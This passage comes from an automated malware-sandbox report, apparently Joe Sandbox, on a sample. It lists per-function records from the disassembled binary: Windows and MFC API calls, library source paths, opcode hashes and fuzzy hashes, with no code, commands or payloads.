                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$HandleService$Sleep
                                • String ID:
                                • API String ID: 994006413-0
                                • Opcode ID: 46bebf3e34fc4473fb7fe6ed8f3ab2bb1a587c0278d98d5050108a78368a3be9
                                • Instruction ID: 446b9162e2188ddf4a95b3ee9c1303d5da0b522182850cb0ad67e821d939de9a
                                • Opcode Fuzzy Hash: 46bebf3e34fc4473fb7fe6ed8f3ab2bb1a587c0278d98d5050108a78368a3be9
                                • Instruction Fuzzy Hash: CEE0B630600BA19BF7439BE1CCCCB5B37ADEB09782F498214E50699198CB35D8448EA2
                                APIs
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • __floor_pentium4.LIBCMT ref: 007E51F2
                                • __floor_pentium4.LIBCMT ref: 007E520E
                                  • Part of subcall function 006EF730: __wcstombs_l.LIBCMTD ref: 006EF743
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message__floor_pentium4$PeekPostQuit__wcstombs_l
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
                                • API String ID: 1910115-2040512386
                                • Opcode ID: fd78882777182f2b4f4589bcc5e65a775281ed502c45b41eeaf6ceaa97db071c
                                • Instruction ID: 51341cd11ee04ee710b2c8bc525813a549d6d5b2d3c632d7ba2d1b5d6208d5e0
                                • Opcode Fuzzy Hash: fd78882777182f2b4f4589bcc5e65a775281ed502c45b41eeaf6ceaa97db071c
                                • Instruction Fuzzy Hash: DDD15D74E0165CCBDB14CF95D984AADFBB1FF88308F208099D489AB386DB3598A5CF45
                                APIs
                                • GetObjectA.GDI32(ED5B0DC1,00000018,?), ref: 007EB14B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
                                • API String ID: 2936123098-2040512386
                                • Opcode ID: a618eb256cc8389fbb8d56064eb2ed622baa9e3d13ebed14296cb00b2513b569
                                • Instruction ID: f614a8663e83f3eac1e11ee058f5cac6f6b28fa70c103b4fca5c4a849eb7d01a
                                • Opcode Fuzzy Hash: a618eb256cc8389fbb8d56064eb2ed622baa9e3d13ebed14296cb00b2513b569
                                • Instruction Fuzzy Hash: 42B11770A01259DFDB24CF99CC95BAEBBB5FF48304F108199E509AB290D738AE85CF51
                                APIs
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 006DDFDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                • String ID: __atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
                                • API String ID: 3936482309-3498923023
                                • Opcode ID: 6f8c222f6977a6de30b5b00e4bdd7c76b05e9bbabfc58508308d4103cee6c21f
                                • Instruction ID: 70632c2a58b35579ac26b578fbf6c4bed8c7ec159d149494a642ad4edb45cb16
                                • Opcode Fuzzy Hash: 6f8c222f6977a6de30b5b00e4bdd7c76b05e9bbabfc58508308d4103cee6c21f
                                • Instruction Fuzzy Hash: 0671E470A40345AFEB64EBA8DC07BAFB7D5EF51304F04455EF65ADB382DBB0A9008661
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Mpunct
                                • String ID: c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 4240859931-2929274957
                                • Opcode ID: de8c3cc5f2cfbbb00c9f6130234aa5581504b62bf5a1f97b4ab0712cc6613e59
                                • Instruction ID: 42f00465cb0908cb2787dc7ca45950504d5f698e87585df1112aa2abac10eab4
                                • Opcode Fuzzy Hash: de8c3cc5f2cfbbb00c9f6130234aa5581504b62bf5a1f97b4ab0712cc6613e59
                                • Instruction Fuzzy Hash: 23712635A80B05EFD724D668CC46BA9F3A5FB51724F10874DE1299B3C1CBB4B904CBA2
                                APIs
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 006D5F0C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                • String ID: __atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
                                • API String ID: 3936482309-3498923023
                                • Opcode ID: 8be198952fe9d860e419807b97b53d7c109fa5910bd72e69525886f35c91f147
                                • Instruction ID: c80751626b51cefd9829b2b1b287d92956ba179e1cecab921dede88f5f2026a7
                                • Opcode Fuzzy Hash: 8be198952fe9d860e419807b97b53d7c109fa5910bd72e69525886f35c91f147
                                • Instruction Fuzzy Hash: 94510470B40745AFE764EBA8DC43BAFB3D5EB51300F00451EF61ADB782DBB0A9008661
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Mpunct
                                • String ID: c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 4240859931-2929274957
                                • Opcode ID: 332d47ce36b1e0e8eb2a0665d76a7a6d6956d9fdcdc16145e428417ab1ce98e1
                                • Instruction ID: 0b220be3996cd656885a2a78bd9e06e1d4c6e58d6e8be48e06a9c9650461f0f1
                                • Opcode Fuzzy Hash: 332d47ce36b1e0e8eb2a0665d76a7a6d6956d9fdcdc16145e428417ab1ce98e1
                                • Instruction Fuzzy Hash: FC51D531A80B05AFD724DA2CCD46BA5B3A5FB91724F10871EE129973C2CBB4B944CA91
                                APIs
                                Strings
                                • ,, xrefs: 006F78F6
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F79A1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: ,$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 2102423945-369471882
                                • Opcode ID: eeafc46fc28679e9bef562be669f8bf6b018bec559412f7217a1c89fbda241c6
                                • Instruction ID: 43db3547b882d42b510a0761afc0c85bbe32d7bbb3d17248ad863d24e6da5d5f
                                • Opcode Fuzzy Hash: eeafc46fc28679e9bef562be669f8bf6b018bec559412f7217a1c89fbda241c6
                                • Instruction Fuzzy Hash: F1611B74A00218DFCB14DFD4C899BADB7B2FF88300F244658E9156B396D7B5AD46CB90
                                APIs
                                  • Part of subcall function 007B0EB0: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 007B0FD0
                                  • Part of subcall function 007B0EB0: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 007B0FE8
                                  • Part of subcall function 007B0EB0: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 007B1000
                                  • Part of subcall function 007B0EB0: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 007B1018
                                  • Part of subcall function 007B0EB0: GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 007B1030
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 007A639B
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007A64FD
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp, xrefs: 007A63CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Messagestd::_$Fac_nodeFac_node::_Iterator_baseIterator_base::_PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp
                                • API String ID: 1901425260-1041283978
                                • Opcode ID: b3f725f39d16a3a90691214596c842d8460543f95ee616d264f040f167ed5149
                                • Instruction ID: 08ce9e905332329cad34752bc45e35f3d72a71b438f563147f488c7ccdcc1ae7
                                • Opcode Fuzzy Hash: b3f725f39d16a3a90691214596c842d8460543f95ee616d264f040f167ed5149
                                • Instruction Fuzzy Hash: 4051CCB4A05309CFDB14DF54C49ABAEBBB1FB44318F144268DA055F392C7B66885CFA0
                                APIs
                                • LresultFromObject.OLEACC(009344C4,?,00000000,?,?,?,?,?,?,?,?,?,009135D8,000000FF), ref: 006FF36A
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • LresultFromObject.OLEACC(009344C4,?,00000000,?,?,?,?,?,?,?,?,?,009135D8,000000FF), ref: 006FF39C
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006FF295
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: FromLresultMessageObject$PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 1065372534-4102074842
                                • Opcode ID: 7a77118846015dae9ec6bddeeeb18eacfa1c2dc62915efc17b28f270e4de1bc9
                                • Instruction ID: 464ea46272c431d3133c9721fbc321953a13a5900a6d3b272a3441428f7e9873
                                • Opcode Fuzzy Hash: 7a77118846015dae9ec6bddeeeb18eacfa1c2dc62915efc17b28f270e4de1bc9
                                • Instruction Fuzzy Hash: 9E4107B5A01209DFCB04DFA4C945BEEB7B5FF88314F208229E515A7391D778AA41CFA4
                                APIs
                                • DestroyWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006F7E65
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: DestroyWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp$|vo
                                • API String ID: 3375834691-4222728044
                                • Opcode ID: e8779dcdc056ecba41a5f6951075fd2db796db146de036b7d237c58f32df2183
                                • Instruction ID: ec88ab605e8d06d95b21410cb6f2522ef61b0132ede9e3ed85d65658fc3f5413
                                • Opcode Fuzzy Hash: e8779dcdc056ecba41a5f6951075fd2db796db146de036b7d237c58f32df2183
                                • Instruction Fuzzy Hash: DE41C675E0820EDFDB14DB94C446BBEBBB2BF48305F1045A9E605AB381D7749E81CB90
                                APIs
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • CreateDIBSection.GDI32(00000000,00000028,00000000,00000000,00000000,00000000), ref: 007EF373
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$CreatePeekPostQuitSection
                                • String ID: ($f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
                                • API String ID: 836661822-3884852572
                                • Opcode ID: 5694eeb26a02f419f4702b83249e87fee4079a721905ef2de3f86b532602e4d7
                                • Instruction ID: ae3ddfb6a25e842b8ca6f5730d2b1ffcd7a2de1336fb460217d12cfa1dc73e0d
                                • Opcode Fuzzy Hash: 5694eeb26a02f419f4702b83249e87fee4079a721905ef2de3f86b532602e4d7
                                • Instruction Fuzzy Hash: D841F774A06208EFDB14CF99D585BDDBBB5FF48310F208069E908AB780D7799A80CF94
                                APIs
                                • WinHelpA.USER32(00000707,?,?,?), ref: 006F94C3
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$HelpPeekPostQuit
                                • String ID: WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 941453386-844199379
                                • Opcode ID: 9c09a8ace6ce3ade7cc9aee0df63f493343df6cfe7d66c51feabaa6f3bc873da
                                • Instruction ID: fd021599756ee3a975c04661e33802be5002b8704b63ff8453a5d4cc20cb46e8
                                • Opcode Fuzzy Hash: 9c09a8ace6ce3ade7cc9aee0df63f493343df6cfe7d66c51feabaa6f3bc873da
                                • Instruction Fuzzy Hash: 94316071A44209EBD704EFA8CC56FAE77B9AF54710F108259F614AB3C1DB74AD41CBA0
                                APIs
                                • GetDlgCtrlID.USER32(00000000), ref: 006FAE37
                                • IsWindow.USER32(00000000), ref: 006FAE67
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$CtrlPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 232972121-4102074842
                                • Opcode ID: b09b99407f5cd2498c5c9ae4516f11eb30491c7fa6c067c469baee9294578b83
                                • Instruction ID: 55c244bcc8571de0a5bea54b2f9d37f7299798fe63e3270b3b4d66fee2b25965
                                • Opcode Fuzzy Hash: b09b99407f5cd2498c5c9ae4516f11eb30491c7fa6c067c469baee9294578b83
                                • Instruction Fuzzy Hash: 9C312FB4E0020E9FCB14DF94C845ABFB7B6BF88300F108569EA14A7380D774D941DBA5
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 006F714C
                                • SetWindowsHookExA.USER32(00000005,006F6CF0,00000000,00000000), ref: 006F715C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CurrentHookThreadWindows
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 1904029216-4102074842
                                • Opcode ID: 2b7883137e032ed7f066342971c5bc8ebbb1f349cd978c7494064ac90f92ac1c
                                • Instruction ID: a1605614dd3b75982d80f68cceaefc6a9d40daf42f37f3e21da5aab2f361f5eb
                                • Opcode Fuzzy Hash: 2b7883137e032ed7f066342971c5bc8ebbb1f349cd978c7494064ac90f92ac1c
                                • Instruction Fuzzy Hash: 4121D13464420CEBEB14DF44C949FBE33A7AF84751F244168EA04A63C1DB70DE85CB55
                                APIs
                                • __CxxThrowException@8.LIBCMTD ref: 0072651D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: CArchive exception: %hs.$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp
                                • API String ID: 2005118841-2439379926
                                • Opcode ID: e76e49e40d4bf138209183cf49a2785132a20e8388b5812386f2d64e22ccf28c
                                • Instruction ID: 1566220f45ded25ff6ce500a2f4b4ebd1f0736fdce15c02d22b056041eb498cb
                                • Opcode Fuzzy Hash: e76e49e40d4bf138209183cf49a2785132a20e8388b5812386f2d64e22ccf28c
                                • Instruction Fuzzy Hash: 28214AB1E40348EFCB10EF94D845BAEB7B5EB48714F10852AF915AB2C1EB755A40CBA4
                                APIs
                                Strings
                                • nRefs > 0, xrefs: 006D1A86
                                • c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h, xrefs: 006D1A8F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
